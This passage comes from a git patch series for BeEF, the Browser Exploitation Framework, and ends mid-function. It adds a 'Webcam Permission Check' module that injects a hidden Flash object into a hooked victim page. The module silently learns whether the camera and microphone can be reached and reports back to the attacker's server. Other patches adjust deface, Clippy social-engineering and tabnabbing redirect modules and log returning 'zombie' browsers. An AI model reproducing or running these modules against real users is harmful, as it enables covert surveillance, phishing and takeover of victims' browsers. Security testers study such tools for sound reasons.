zHpMI2cCCevxTrr2=Y<PwSN#`fXHmx*)FjNzjt*ubT#xJ7Q^pz*-t52~$WkW%PQ}(*
zUZ}PFJ8Io|J*^=OVIeGHD~08->xdg?ap5fJCmKlLOx$6CVLm0hz@V~p{54z##bz2?
zH*cAH`gs(sHE_1h|BCIraNcdWnY;eQ+1c~dpa?xOJB#7cD7q#2eLPxB$_S4aDe4>Y
z5qtGux@=t#pn)3@KqD9uijDe*`~<~TaC@DPE<_EN{s}lQofr9RCBucJ&{t+>FEU{|
zf91T(aIruLbunbT@|NJ0C*O!$enoVPwnN)CxJ4LW5!;B!T5TyuHpW&WvQ_Kg$jaCT
zMB20^9NB<NXcA>feiQf_t}wX7gv+R}6nGW&E#<ESdbu%osk5_iamtXm$#yzOWf2ve
zYb~MH3vj-u^Wwz|^<SQyz3}KmC~eRGK-z^zFHSiEOAm!G8cGaayoBz1@$z}ekXUu-
zpzV@o*(J#z!S$39yYrVzi9L_vym_4WLi90UaPh^##{gcb!CW-9N?T>qv`segQ{$^H
zzHueGsl${Ko8B;GLo#H2lUsI6+9pPPm^*5#FgWXQXmmLOk>wCwj`!elI}3^~*H$4I
z+r;Sjrr0V*P#PnR_u5J=6$DB4;yKz=iaZYdylN4V(u8Nx@)C2ugwkHI#g)nsax8N-
zO7ayt)7^fh-IUr*x!rWNo3!0@x0{}J)7x$;?WV8Y^tYQ;?Phhm8E7|y?Pg88S=(;b
zwVU-AjUg-zybZhn=uZP-Zb}YN4onrVTuXeeXnHvU6{^c&HKl8*$ZLxgDpa}5D_=`R
zUN=X?3RNoex~`=nFTH5Euv5VXu`2EjM18zP-0$dZD28uJuMFhab9`g@jjE|Ioi3Wy
zjv7XlQC(qk*_h2n4L6^`a2p<5w8!vb>qjyE=fZ9rUK^GTW!k7kY9K5aeg~{Ee75kQ
z;WdJY*YOs0s&|%Z)Ej}yWTK5dSH@t<s55FRebmNmMH-lUDsMKN4;djmTSoqUcFu3l
zT<y2b*Yn%vg?@8asND<wwwPM+TcAR1U+A~R)QaC4E7aD7ep^ia@A$3tKl58)k>9%i
zZ~fN3$Zw5{{N`Tdx6N~YJ74kG3EN|#Knp)LjSyaVSo1T>uBQi|0O0JLc~|}S@$ABL
zd%1w;wuL9avUPG~8AO+{0B@GFA?IKjbejE(Fyb_@sIiI55L-6a%yAOuFloh<NWRUU
z%;m5J9X7W;_JU0-IV5qB@Zh3}g+;_Ni+BwYXI#M#xLf(PatSA;_5|vO7AS`ufhx2Y
z9-P}tXeA__hZ5T7A7*FEVivG;Ud@72tdwwyXNAffZfA~Zaq%2MN5GDfb99wu1nS?x
zgkoO)wgvK)kfTCiv4pMfE}>&yg8CeUe!gfGWf5!NUBuGsC=pyNq3zuzEV)Jrw9_gc
zX-946dmQKcuIK6Nx>&qk6!b2NEk>)+4WgX|xv}`L__0(Om;s_X=lrJ2kkwy;1Jh`4
z>B3;IfH{(ruZ4J0utsaKQ!d=gyy3frr(C=0-=3Y-*4T0`K9@JWWw?07@G?>tz<akD
zFMm#oG((`x!JQNX4+STi!k%celSw!<B(Ppn3AlJtro4eCiNeTdJNPG#HQE|OK^8_{
z4gL@_EbOTB*iv0M>f%03j@*GK`8app^aVtO&bx7p+ZoeQgEA2_l+Ofzgu~r<u;n|@
z9D(W%p6Z%a0WbGdvq4eZ`6@ipu<v=>*D`|DuMEnNH~q-K(ZIB`l=1{q<+5Nw3wpRf
zH=jDB*^2kp(gliRVl69@{8x6S$Ft_bf?R?pu2|&23r-U43OvkDvI}^UU&P~k@JSGm
zJz9mSZ@^Ag2CD#X1)JcWCwMqv4)bbVh7?9aO^3aPXL>5E7~bhA^&Ie{Qww9CkN5fQ
zzAE0w>6?*W#p%^HJy51&GR)Incl{Wq;4(%QUXylkuYMjMZ}NFeu3{|=EzD%*!bey&
zYi3KCz$8ZP2U-(8$vT+G+{}lMpCxP=Tf^2e55DdALuffZ-#XbQeCO3NypUKMTgNuC
z8(1Aa-d3>HtP7uWH{x@zo~^{kT$uIX18Ez+1y?b~y739O1s{VuS?`fu<1Ml6Q6Jki
z<b(0;vCazE8DkZY#TqJLLu>~l9k$AV&n8|-r5p*4?}%-)7bKwClD#Z6HmdAp$`RlA
zw%AraSU?7`!(OP!<PIivI3n*v0b64o<>3UogD9c~SF@h&Mp3o+0M$|8N_>RYu^#mU
zpgs(EWZ(>|*dFyYP~QMt?qRhAxN~ut8}Ln<Q||^_fe>1$5v|yS)>w_!YDa5!pv5+!
z&2B{7aC`LOlXrj(vc34E-Oq;DFdJc`><B(}kFn$I1U@w5_}oq4BX^u7*=;P(3arRZ
zvq^jgpJjKb9|XKE)O$d^7u5Sey&u#EKz$I@M?ifP)K7r=7^shf`UI#?g8CGwPlGxQ
z>hqw!0P2gNz69#apuPg?r$GHQsGkG%k3s!BsDA?L7eM_YsDBFTmq7h9P|t(<HBi3}
z>Ni0B3sBz#^_!r63)F9edI8jnp#C+emq5J?>J?DG3+nekeGAkdg8DY7e-G-9K>abO
zKLPcppuPj@&p`b-sQ(D+uR#4LP=5{TKZE)kQ2zzge+Bj5K>aNonTGL>*jnx=anAGe
z-bc@^jV*l_*DsB=Ra`G{hl_TU%eL=r+9Zl-i!GTG5wwMH*SjzTcBAVlI{$VIf|a)G
zQFa|V-41}V>pd6-8_@l~<WayqUjp0jjBUiFGZj}j7X$MV@W1K*yW#(P2)v8`-`)93
zVmqV0bzXi3?2PTIfV*OADksC5SXTw?iiIm+IJUV0Zl2jsN{sj=`}@hI5{p-HFkZaG
z$mJ62@$s8cR_|{sJ<l(c%lz*$h<_7P24VU+n-pz~G?M7*$Z8V3;X>pFev`Mk+>-pD
z;M@?c{H~7m*dJQQdz=@o^SZ@6Lg5L-y2v^bZI85*=#8bsQ&37g4Urp#XltaEM7ty1
zgpuN9ELX6Y(n10DRijm|ngM<xHkAxa5+Y4vbiLN4u?yM?ZROy4xp*1zu-0%<+o)~e
z_!Y!AYYlkEmkFlCuLXQP;q}0^sDF)r7qKaLO>mv+AIB5|=d4!I2K+n2Ie&*qkpfft
z9=yQ7248$s-(9|zaeX{N(t7aHZ0Fw$t1Exf@Ej9b#zSbSHS?bgI~ILoTwD3Z_{s7&
aMzLkw&%dPB@;~Lx{nOblME(Ofu&=KNOxqj)

literal 0
HcmV?d00001

diff --git a/modules/browser/webcam_permision_check/command.js b/modules/browser/webcam_permision_check/command.js
new file mode 100644
index 000000000..310b0fd61
--- /dev/null
+++ b/modules/browser/webcam_permision_check/command.js
@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+beef.execute(function() {
+    
+       
+    //These 3 functions [naPermissions() The camera is not available or not supported
+    //					 yesPermissions() The user is allowing access to the camera / mic
+    //					yesPermissions() The user has not allowed access to the camera / mic
+    // Flash will invoke these functions directly.
+    var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed  BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
+    
+    //This function is called by swfobject, if if fails to add the flash file to the page
+    
+    js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
+    
+    
+    var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
+        
+    //A library that helps include the swf file
+    var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    
+    //This is the javascript that actually calls the swfobject library to include the swf file 
+    var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    
+
+    //Add flash content
+    $j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
+    
+});
+
+
+
+
+
diff --git a/modules/browser/webcam_permision_check/config.yaml b/modules/browser/webcam_permision_check/config.yaml
new file mode 100644
index 000000000..78558df0d
--- /dev/null
+++ b/modules/browser/webcam_permision_check/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        wb:
+            enable: true
+            category: "Browser"
+            name: "Webcam Permission Check"
+            description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)"
+            authors: ["@bw_z"]
+            target:
+                 working: ["All"]
diff --git a/modules/browser/webcam_permision_check/module.rb b/modules/browser/webcam_permision_check/module.rb
new file mode 100644
index 000000000..2cf19a11d
--- /dev/null
+++ b/modules/browser/webcam_permision_check/module.rb
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Wb < BeEF::Core::Command
+  def pre_send
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/cameraCheck.swf', '/cameraCheck', 'swf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/swfobject.js', '/swfobject', 'js')
+  end
+  
+  def post_execute 
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
+	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+  end
+
+end
diff --git a/modules/browser/webcam_permision_check/swfobject.js b/modules/browser/webcam_permision_check/swfobject.js
new file mode 100644
index 000000000..8eafe9dd8
--- /dev/null
+++ b/modules/browser/webcam_permision_check/swfobject.js
@@ -0,0 +1,4 @@
+/*	SWFObject v2.2 <http://code.google.com/p/swfobject/> 
+	is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> 
+*/
+var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y<X;Y++){U[Y]()}}function K(X){if(J){X()}else{U[U.length]=X}}function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load",Y,false)}else{if(typeof j.addEventListener!=D){j.addEventListener("load",Y,false)}else{if(typeof O.attachEvent!=D){i(O,"onload",Y)}else{if(typeof O.onload=="function"){var X=O.onload;O.onload=function(){X();Y()}}else{O.onload=Y}}}}}function h(){if(T){V()}else{H()}}function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setAttribute("type",q);var Z=X.appendChild(aa);if(Z){var Y=0;(function(){if(typeof Z.GetVariable!=D){var ab=Z.GetVariable("$version");if(ab){ab=ab.split(" ")[1].split(",");M.pv=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}else{if(Y<10){Y++;setTimeout(arguments.callee,10);return}}X.removeChild(aa);Z=null;H()})()}else{H()}}function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[af].id;var ab=o[af].callbackFn;var aa={success:false,id:Y};if(M.pv[0]>0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad<ac;ad++){if(X[ad].getAttribute("name").toLowerCase()!="movie"){ah[X[ad].getAttribute("name")]=X[ad].getAttribute("value")}}P(ai,ah,Y,ab)}else{p(ae);if(ab){ab(aa)}}}}}else{w(Y,true);if(ab){var Z=z(Y);if(Z&&typeof Z.SetVariable!=D){aa.success=true;aa.ref=Z}ab(aa)}}}}}function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typeof Y.SetVariable!=D){X=Y}else{var Z=Y.getElementsByTagName(r)[0];if(Z){X=Z}}}return X}function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X);if(ae){if(ae.nodeName=="OBJECT"){l=g(ae);Q=null}else{l=ae;Q=X}aa.id=R;if(typeof aa.width==D||(!/%$/.test(aa.width)&&parseInt(aa.width,10)<310)){aa.width="310"}if(typeof aa.height==D||(!/%$/.test(aa.height)&&parseInt(aa.height,10)<137)){aa.height="137"}j.title=j.title.slice(0,47)+" - Flash Player Installation";var ad=M.ie&&M.win?"ActiveX":"PlugIn",ac="MMredirectURL="+O.location.toString().replace(/&/g,"%26")+"&MMplayerType="+ad+"&MMdoctitle="+j.title;if(typeof ab.flashvars!=D){ab.flashvars+="&"+ac}else{ab.flashvars=ac}if(M.ie&&M.win&&ae.readyState!=4){var Y=C("div");X+="SWFObjectNew";Y.setAttribute("id",X);ae.parentNode.insertBefore(Y,ae);ae.style.display="none";(function(){if(ae.readyState==4){ae.parentNode.removeChild(ae)}else{setTimeout(arguments.callee,10)}})()}u(aa,ab,X)}}function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNode.insertBefore(X,Y);X.parentNode.replaceChild(g(Y),X);Y.style.display="none";(function(){if(Y.readyState==4){Y.parentNode.removeChild(Y)}else{setTimeout(arguments.callee,10)}})()}else{Y.parentNode.replaceChild(g(Y),Y)}}function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML}else{var Y=ab.getElementsByTagName(r)[0];if(Y){var ad=Y.childNodes;if(ad){var X=ad.length;for(var Z=0;Z<X;Z++){if(!(ad[Z].nodeType==1&&ad[Z].nodeName=="PARAM")&&!(ad[Z].nodeType==8)){aa.appendChild(ad[Z].cloneNode(true))}}}}}return aa}function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(typeof ai.id==D){ai.id=Y}if(M.ie&&M.win){var ah="";for(var ae in ai){if(ai[ae]!=Object.prototype[ae]){if(ae.toLowerCase()=="data"){ag.movie=ai[ae]}else{if(ae.toLowerCase()=="styleclass"){ah+=' class="'+ai[ae]+'"'}else{if(ae.toLowerCase()!="classid"){ah+=" "+ae+'="'+ai[ae]+'"'}}}}}var af="";for(var ad in ag){if(ag[ad]!=Object.prototype[ad]){af+='<param name="'+ad+'" value="'+ag[ad]+'" />'}}aa.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'+ah+">"+af+"</object>";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab<ac;ab++){I[ab][0].detachEvent(I[ab][1],I[ab][2])}var Z=N.length;for(var aa=0;aa<Z;aa++){y(N[aa])}for(var Y in M){M[Y]=null}M=null;for(var X in swfobject){swfobject[X]=null}swfobject=null})}}();return{registerObject:function(ab,X,aa,Z){if(M.w3&&ab&&X){var Y={};Y.id=ab;Y.swfVersion=X;Y.expressInstall=aa;Y.callbackFn=Z;o[o.length]=Y;w(ab,false)}else{if(Z){Z({success:false,id:ab})}}},getObjectById:function(X){if(M.w3){return z(X)}},embedSWF:function(ab,ah,ae,ag,Y,aa,Z,ad,af,ac){var X={success:false,id:ah};if(M.w3&&!(M.wk&&M.wk<312)&&ab&&ah&&ae&&ag&&Y){w(ah,false);K(function(){ae+="";ag+="";var aj={};if(af&&typeof af===r){for(var al in af){aj[al]=af[al]}}aj.data=ab;aj.width=ae;aj.height=ag;var am={};if(ad&&typeof ad===r){for(var ak in ad){am[ak]=ad[ak]}}if(Z&&typeof Z===r){for(var ai in Z){if(typeof am.flashvars!=D){am.flashvars+="&"+ai+"="+Z[ai]}else{am.flashvars=ai+"="+Z[ai]}}}if(F(Y)){var an=u(aj,am,ah);if(aj.id==ah){w(ah,true)}X.success=true;X.ref=an}else{if(aa&&A()){aj.data=aa;P(aj,am,ah,ac);return}else{w(ah,true)}}if(ac){ac(X)}})}else{if(ac){ac(X)}}},switchOffAutoHideShow:function(){m=false},ua:M,getFlashPlayerVersion:function(){return{major:M.pv[0],minor:M.pv[1],release:M.pv[2]}},hasFlashPlayerVersion:F,createSWF:function(Z,Y,X){if(M.w3){return u(Z,Y,X)}else{return undefined}},showExpressInstall:function(Z,aa,X,Y){if(M.w3&&A()){P(Z,aa,X,Y)}},removeSWF:function(X){if(M.w3){y(X)}},createCSS:function(aa,Z,Y,X){if(M.w3){v(aa,Z,Y,X)}},addDomLoadEvent:K,addLoadEvent:s,getQueryParamValue:function(aa){var Z=j.location.search||j.location.hash;if(Z){if(/\?/.test(Z)){Z=Z.split("?")[1]}if(aa==null){return L(Z)}var Y=Z.split("&");for(var X=0;X<Y.length;X++){if(Y[X].substring(0,Y[X].indexOf("="))==aa){return L(Y[X].substring((Y[X].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(a){var X=c(R);if(X&&l){X.parentNode.replaceChild(l,X);if(Q){w(Q,true);if(M.ie&&M.win){l.style.display="block"}}if(E){E(B)}}a=false}}}}();
\ No newline at end of file

From 159ecb5ade1d2a699878112035d3ddbe95834ad6 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 4 Apr 2013 00:04:45 +1030
Subject: [PATCH 252/397] Fix malformed YAML in 'deface_web_page_component'
 module

---
 .../browser/hooked_domain/deface_web_page_component/config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/browser/hooked_domain/deface_web_page_component/config.yaml b/modules/browser/hooked_domain/deface_web_page_component/config.yaml
index 2af4954c0..311101775 100644
--- a/modules/browser/hooked_domain/deface_web_page_component/config.yaml
+++ b/modules/browser/hooked_domain/deface_web_page_component/config.yaml
@@ -10,6 +10,6 @@ beef:
             category: ["Browser", "Hooked Domain"]
             name: "Replace Component (Deface)"
             description: "Overwrite a particular component of the hooked page."
-            authors: ["antisnatchor","xntrik"]
+            authors: ["antisnatchor", "xntrik"]
             target:
                 user_notify: ['ALL']

From ae98842ad427bc8a0b1bc14b7c3d6f8a9d752c7f Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Thu, 4 Apr 2013 19:37:08 +0800
Subject: [PATCH 253/397] Tiny fix to Clippy so it appears properly. #866

---
 modules/social_engineering/clippy/command.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/social_engineering/clippy/command.js b/modules/social_engineering/clippy/command.js
index c39cacc0b..7d1878e32 100755
--- a/modules/social_engineering/clippy/command.js
+++ b/modules/social_engineering/clippy/command.js
@@ -281,7 +281,7 @@ Clippy.prototype.findHomeBase = function(selector) {
 		div.style.width = "300px";
 		div.style.height = "300px";
 		div.style.backgroundColor = "transparent";
-		div.style.position = "absolute";
+		div.style.position = "fixed";
 		div.style.bottom = "0";
 		div.style.right = "0";
 		

From 69fd3e600c02b2c3e89d46661e785d6a20ff1cb4 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Thu, 4 Apr 2013 21:29:18 +0800
Subject: [PATCH 254/397] Event log now logs when a zombie comes back online.
 #867

---
 core/main/handlers/hookedbrowsers.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb
index 218be6d30..a4939c61c 100644
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -51,13 +51,18 @@ module Handlers
 
       # @note is a known browser so send instructions 
       else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
         # @note record the last poll from the browser
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
         if config.get('beef.http.use_x_forward_for') == true
           if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
-            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
             hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
           end
         else

From 07fe3a9c0e7323c78f9c7ce46507f28befc935f2 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Thu, 4 Apr 2013 21:33:43 +0800
Subject: [PATCH 255/397] Updates to tabnabbing module to use jQuerys wider
 event handling. #868

---
 modules/social_engineering/tabnabbing/command.js | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/modules/social_engineering/tabnabbing/command.js b/modules/social_engineering/tabnabbing/command.js
index d246bcb67..85f24fa71 100644
--- a/modules/social_engineering/tabnabbing/command.js
+++ b/modules/social_engineering/tabnabbing/command.js
@@ -13,14 +13,13 @@ beef.execute(function() {
 	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=waiting for tab to become inactive');
 
 	// begin countdown when the tab loses focus
-	window.onblur = function() {
+	$j(window).blur(function(e) {
 		begin_countdown();
-	}
 
 	// stop countdown if the tab regains focus
-	window.onfocus = function() {
+	}).focus(function(e) {
 		clearTimeout(tabnab_timer);
-	}
+	});
 
 	begin_countdown = function() {
 		tabnab_timer = setTimeout(function() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'tabnab=redirected'); window.location = url; }, wait);

From 2fcdf1038dbbbeda35df1be1a9e388d5c313a5e5 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 6 Apr 2013 14:32:51 +0800
Subject: [PATCH 256/397] xntriks updates to webcam_perm_check

---
 .../browser/webcam_permision_check/command.js | 54 ++++++++++++++++---
 .../webcam_permision_check/config.yaml        |  2 +-
 .../browser/webcam_permision_check/module.rb  |  9 ++--
 3 files changed, 53 insertions(+), 12 deletions(-)

diff --git a/modules/browser/webcam_permision_check/command.js b/modules/browser/webcam_permision_check/command.js
index 310b0fd61..ba7b241e4 100644
--- a/modules/browser/webcam_permision_check/command.js
+++ b/modules/browser/webcam_permision_check/command.js
@@ -12,24 +12,64 @@ beef.execute(function() {
     //					 yesPermissions() The user is allowing access to the camera / mic
     //					yesPermissions() The user has not allowed access to the camera / mic
     // Flash will invoke these functions directly.
-    var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed  BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
-    
+    //var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed  BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
+
     //This function is called by swfobject, if if fails to add the flash file to the page
     
-    js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
-    
+    //js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
+
+    //These functions are global so they can accessed by the cameraCheck.swf file
+
+    noPermissions = function() {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :(");
+    }
+
+    yesPermissions = function() {
